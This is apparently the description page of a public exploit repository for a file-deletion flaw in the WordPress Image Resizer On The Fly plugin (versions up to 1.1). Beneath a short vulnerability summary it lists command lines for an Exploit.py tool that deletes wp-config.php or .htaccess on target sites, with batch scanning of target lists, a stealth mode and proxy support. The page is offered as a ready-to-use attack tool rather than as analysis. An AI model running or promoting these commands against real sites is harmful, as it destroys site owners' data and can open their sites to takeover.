
The Image Resizer On The Fly plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'delete' task in all versions up to, and including, 1.1. This makes it possible for unauthenticated attackers to delete arbitrary files on the server.


Yuri08loveElaina/CVE_2025_6065


  • 🧪 Basic usage: python3 Exploit.py --url https://target.com --cmd wp-config.php
  • 🔍 Plugin check mode: python3 Exploit.py --url https://target.com --check-only
  • 📂 Batch scan mode: python3 Exploit.py --file targets.txt --cmd wp-config.php
  • Example targets.txt:
  • 🕵️‍♂️ Stealth mode + proxy: python3 Exploit.py --url https://target.com --cmd .htaccess --stealth --proxy http://127.0.0.1:8080
  • 🧾 Export results to JSON: python3 Exploit.py --file targets.txt --cmd wp-config.php --json-output result.json
